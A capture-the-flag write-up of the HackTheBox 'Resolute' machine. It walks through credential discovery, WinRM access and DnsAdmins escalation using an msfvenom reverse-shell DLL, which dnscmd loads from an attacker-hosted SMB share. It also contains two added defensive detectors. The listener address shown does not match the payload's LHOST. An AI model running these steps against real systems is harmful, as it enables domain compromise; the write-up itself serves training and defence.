RESOLUTE WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:59 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating Ping Scan at 17:59
    Scanning 10.10.10.169 [4 ports]
    Completed Ping Scan at 17:59, 0.61s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 17:59
    Completed Parallel DNS resolution of 1 host. at 17:59, 0.55s elapsed
    Initiating SYN Stealth Scan at 17:59
    Scanning 10.10.10.169 [1000 ports]
    Discovered open port 135/tcp on 10.10.10.169
    Discovered open port 139/tcp on 10.10.10.169
    Discovered open port 445/tcp on 10.10.10.169
    Discovered open port 53/tcp on 10.10.10.169
    Discovered open port 636/tcp on 10.10.10.169
    Discovered open port 88/tcp on 10.10.10.169
    Discovered open port 593/tcp on 10.10.10.169
    Discovered open port 389/tcp on 10.10.10.169
    Discovered open port 464/tcp on 10.10.10.169
    Discovered open port 3268/tcp on 10.10.10.169
    Discovered open port 3269/tcp on 10.10.10.169
    Completed SYN Stealth Scan at 17:59, 5.30s elapsed (1000 total ports)
    Initiating Service scan at 17:59
    Scanning 11 services on 10.10.10.169
    Completed Service scan at 17:59, 32.87s elapsed (11 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.169
    Retrying OS detection (try #2) against 10.10.10.169
    Retrying OS detection (try #3) against 10.10.10.169
    Initiating Traceroute at 17:59
    Completed Traceroute at 17:59, 0.24s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 17:59
    Completed Parallel DNS resolution of 2 hosts. at 17:59, 0.21s elapsed
    NSE: Script scanning 10.10.10.169.
    Initiating NSE at 17:59
    Completed NSE at 18:00, 19.85s elapsed
    Initiating NSE at 18:00
    Completed NSE at 18:02, 121.98s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Nmap scan report for 10.10.10.169
    Host is up (0.48s latency).
    Not shown: 989 closed ports
    PORT     STATE SERVICE      VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 12:40:45Z)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED10024%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (95%), Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 (92%), Microsoft Windows 10 1507 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.103 days (since Fri May 29 15:33:50 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: Randomized
    Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 2h31m25s, deviation: 4h02m30s, median: 11m24s
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
    |   Computer name: Resolute
    |   NetBIOS computer name: RESOLUTE\x00
    |   Domain name: megabank.local
    |   Forest name: megabank.local
    |   FQDN: Resolute.megabank.local
    |_  System time: 2020-05-29T05:41:21-07:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-05-29T12:41:23
    |_  start_date: 2020-05-29T11:52:09

    TRACEROUTE (using port 110/tcp)
    HOP RTT       ADDRESS
    1   201.02 ms 10.10.14.1
    2   239.28 ms 10.10.10.169

    NSE: Script Post-scanning.
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 190.07 seconds
            Raw packets sent: 1284 (58.614KB) | Rcvd: 1164 (48.694KB)

ENUMERATING USERS

    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[ryan] rid:[0x451]
    user:[marko] rid:[0x457]
    user:[sunita] rid:[0x19c9]
    user:[abigail] rid:[0x19ca]
    user:[marcus] rid:[0x19cb]
    user:[sally] rid:[0x19cc]
    user:[fred] rid:[0x19cd]
    user:[angela] rid:[0x19ce]
    user:[felicia] rid:[0x19cf]
    user:[gustavo] rid:[0x19d0]
    user:[ulf] rid:[0x19d1]
    user:[stevie] rid:[0x19d2]
    user:[claire] rid:[0x19d3]
    user:[paulo] rid:[0x19d4]
    user:[steve] rid:[0x19d5]
    user:[annette] rid:[0x19d6]
    user:[annika] rid:[0x19d7]
    user:[per] rid:[0x19d8]
    user:[claude] rid:[0x19d9]
    user:[melanie] rid:[0x2775]
    user:[zach] rid:[0x2776]
    user:[simon] rid:[0x2777]
    user:[naoki] rid:[0x2778]

Going through the user entries one by one, I found a password in marko's account description:

    index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!

USING THOSE CREDENTIALS

    root@liquid:~/Desktop/HTB/resolute# evil-winrm -u marko -p Welcome123! -i 10.10.10.169

    Evil-WinRM shell v2.0

    Info: Establishing connection to remote endpoint

    Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

    Error: Exiting with code 1

That login failed, so the password does not belong to marko. Now we need to find the user this password actually belongs to.

Since we already have a list of users, I brute-forced the WinRM login with this password against each of them and got melanie as the user.

Let's log in again and grab the flag:

    root@liquid:~/Desktop/HTB/resolute# evil-winrm -u melanie -p  Welcome123! -i 10.10.10.169
    Evil-WinRM shell v2.0
    Info: Establishing connection to remote endpoint
    *Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
    0c3be45fcfe249796ccbee8d3a978540
    *Evil-WinRM* PS C:\Users\melanie\Desktop> 

Let's get another user.

    *Evil-WinRM* PS C:\> ls -hidden


        Directory: C:\


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
    d--hsl        9/25/2019  10:17 AM                Documents and Settings
    d--h--        9/25/2019  10:48 AM                ProgramData
    d--h--        12/3/2019   6:32 AM                PSTranscripts
    d--hs-        9/25/2019  10:17 AM                Recovery
    d--hs-        9/25/2019   6:25 AM                System Volume Information
    -arhs-       11/20/2016   5:59 PM         389408 bootmgr
    -a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
    -a-hs-        5/30/2020  10:49 AM      402653184 pagefile.sys

There are more hidden items under this directory, and PSTranscripts is the interesting one:

    *Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063201
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    Command start time: 20191203063455
    **********************
    PS>TerminatingError(): "System error."
    >> CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Command start time: 20191203063455
    **********************
    PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
    PS megabank\ryan@RESOLUTE Documents>
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************

The transcript gives us ryan's credentials: ryan : Serv3r4Admin4cc123!

    root@liquid:~/Desktop/HTB/resolute# evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!
    Evil-WinRM shell v2.3
    Info: Establishing connection to remote endpoint
    *Evil-WinRM* PS C:\Users\ryan\Documents> 
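The leaked password above is an instance of a general hygiene problem: PowerShell transcription records the full text of every command, so a password typed into `net use` or `ConvertTo-SecureString -AsPlainText` ends up in a text file whose ACL rarely gets reviewed. The following scanner is an added example, not part of the original writeup; it walks a constructed transcript excerpt (same record layout as the `PowerShell_transcript.*.txt` file above, placeholder host, user and password values) and flags the lines a defender would need to rotate and clean up.

```python
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    rule: str
    excerpt: str


# Constructed transcript excerpt in the record layout of a real
# PowerShell_transcript.*.txt; every value in it is a placeholder.
SAMPLE_TRANSCRIPT = r"""Windows PowerShell transcript start
Username: CORP\svc_backup
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ExamplePassw0rd! /user:CORP\svc_backup
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net use Y: \\fs01\public * /user:CORP\svc_backup
>> ParameterBinding(Invoke-Expression): name="Command"; value="$s = ConvertTo-SecureString 'Hunter2!' -AsPlainText -Force
"""

# The typed command is logged inside value="..." of the Invoke-Expression binding.
_CMD_VALUE = re.compile(r'name="Command";\s*value="(?P<cmd>.*)$')
# Tokens that are legitimately allowed after "net use": switches, '*' (prompt), drive letters.
_SWITCH_OR_DRIVE = re.compile(r"^(?:/\S*|\*|[A-Za-z]:)$")


def net_use_positional_secrets(cmd: str) -> List[str]:
    """net use [drive] UNC [password | *] [/user:...]: any other token after
    'use' was typed as a cleartext password and is now on disk."""
    toks = cmd.split()
    low = [t.lower() for t in toks]
    for i in range(len(toks) - 1):
        if low[i] == "net" and low[i + 1] == "use":
            rest = toks[i + 2:]
            break
    else:
        return []
    return [t for t in rest if not (_SWITCH_OR_DRIVE.match(t) or t.startswith("\\\\"))]


def scan_transcript(text: str) -> List[Finding]:
    """Return one Finding per transcript line that wrote a cleartext secret."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = _CMD_VALUE.search(line)
        if not m:
            continue
        cmd = m.group("cmd").rstrip()
        if net_use_positional_secrets(cmd):
            findings.append(Finding(n, "net use with cleartext password", cmd))
        elif re.search(r"ConvertTo-SecureString.*-AsPlainText", cmd, re.I):
            findings.append(Finding(n, "ConvertTo-SecureString -AsPlainText literal", cmd))
    return findings
```

The `net use Y: ... *` form is deliberately not flagged: the asterisk makes Windows prompt for the password, which is the safe way to map a share interactively.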

GETTING ROOT ACCESS

    *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

    USER INFORMATION
    ----------------

    User Name     SID
    ============= ==============================================
    megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


    GROUP INFORMATION
    -----------------

    Group Name                                 Type             SID                                            Attributes
    ========================================== ================ ============================================== ===============================================================
    Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
    MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


    USER CLAIMS INFORMATION
    -----------------------

    User claims unknown.

    Kerberos support for Dynamic Access Control on this device has been disabled.

User ryan is a member of the DnsAdmins group, which allows configuring the DNS server with dnscmd.

    root@liquid:~/Desktop/HTB/resolute# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.140 LPORT=9977 -f dll > liquid.dll
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 510 bytes
    Final size of dll file: 5120 bytes

Next, the DLL has to be reachable from the target. It can either be uploaded to the box or served from an SMB share on the attacking machine; I used smbserver:

    root@liquid:~/Desktop/HTB/resolute# python smbserver.py -smb2support EXPLOIT /root/Desktop/HTB/resolute/
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [*] Config file parsed
    [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    [*] Config file parsed
    [*] Config file parsed
    [*] Config file parsed

Then, on the victim machine, point the DNS server's plugin DLL at the share and restart the service:

    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> dnscmd  /config /serverlevelplugindll \\10.10.14.140\EXPLOIT\liquid.dll

    Registry property serverlevelplugindll successfully reset.
    Command completed successfully.

    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe stop dns

    SERVICE_NAME: dns
            TYPE               : 10  WIN32_OWN_PROCESS
            STATE              : 3  STOP_PENDING
                                    (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x0
    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe start dns

    SERVICE_NAME: dns
            TYPE               : 10  WIN32_OWN_PROCESS
            STATE              : 2  START_PENDING
                                    (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x7d0
            PID                : 3048
            FLAGS              :
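From the defender's side the sequence above leaves a clear trail: a `dnscmd.exe` process with `/config /serverlevelplugindll` on its command line, a write to the `ServerLevelPluginDll` value under the DNS service's `Parameters` key, and a stop/start of the `dns` service that makes `dns.exe` load the DLL as SYSTEM. The detector below is an added example, not part of the writeup; it runs over constructed events in a Sysmon-like shape (event ID 1 process creation, event ID 13 registry value set; the field names follow Sysmon, the hosts, users and paths are made up).

```python
import re
from typing import Dict, List, NamedTuple

# Registry value the Windows DNS service loads as a plugin DLL at start-up;
# it is what "dnscmd /config /serverlevelplugindll <path>" writes.
PLUGIN_VALUE = r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"


class Alert(NamedTuple):
    index: int
    severity: str
    reason: str


# Constructed events in a Sysmon-like shape: EventID 1 = process create,
# EventID 13 = registry value set. Field names follow Sysmon; every value
# (hosts, users, paths) is made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\dnscmd.exe", "User": r"CORP\contractor1",
     "CommandLine": r"dnscmd /config /serverlevelplugindll \\10.0.0.5\share\plugin.dll"},
    {"EventID": "13", "Image": r"C:\Windows\System32\dns.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": PLUGIN_VALUE, "Details": r"\\10.0.0.5\share\plugin.dll"},
    {"EventID": "1", "Image": r"C:\Windows\System32\sc.exe", "User": r"CORP\contractor1",
     "CommandLine": "sc.exe stop dns"},
    {"EventID": "1", "Image": r"C:\Windows\System32\dnscmd.exe", "User": r"CORP\dnsops",
     "CommandLine": "dnscmd /zoneprint corp.local"},
]

_PLUGIN_CLI = re.compile(r"/serverlevelplugindll\b", re.I)
_DNS_RESTART = re.compile(r"\bsc(?:\.exe)?\s+(?:stop|start)\s+dns\b", re.I)


def detect_dns_plugin_abuse(events: List[Dict[str, str]]) -> List[Alert]:
    """Flag the ServerLevelPluginDll sequence: dnscmd config, registry write,
    then a DNS service restart that makes dns.exe load the DLL as SYSTEM."""
    alerts: List[Alert] = []
    plugin_changed = False
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == "13" and ev.get("TargetObject", "").lower() == PLUGIN_VALUE.lower():
            dll = ev.get("Details", "")
            # A UNC path means the DLL is pulled from another host at load time.
            sev = "critical" if dll.startswith("\\\\") else "high"
            alerts.append(Alert(i, sev, f"ServerLevelPluginDll set to {dll}"))
            plugin_changed = True
        elif eid == "1":
            cmd = ev.get("CommandLine", "")
            if _PLUGIN_CLI.search(cmd):
                alerts.append(Alert(i, "high", f"dnscmd plugin change by {ev.get('User')}"))
                plugin_changed = True
            elif plugin_changed and _DNS_RESTART.search(cmd):
                alerts.append(Alert(i, "high", "DNS service restart after plugin change"))
    return alerts
```

Ordinary DnsAdmins work such as `dnscmd /zoneprint` is left alone; an audit variant of the same check simply reads the live registry value and alerts whenever it is non-empty, since a legitimate plugin DLL on a domain controller is rare.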

Back in msfconsole, the handler catches the connection and we get a SYSTEM shell:

    msf5 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 10.10.14.4:5678 
    [*] Sending stage (206403 bytes) to 10.10.10.169
    [*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400

    meterpreter > 
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > cd ../../../
    meterpreter > cat root.txt
    e1d94876a506850d0c20edb5405e619c
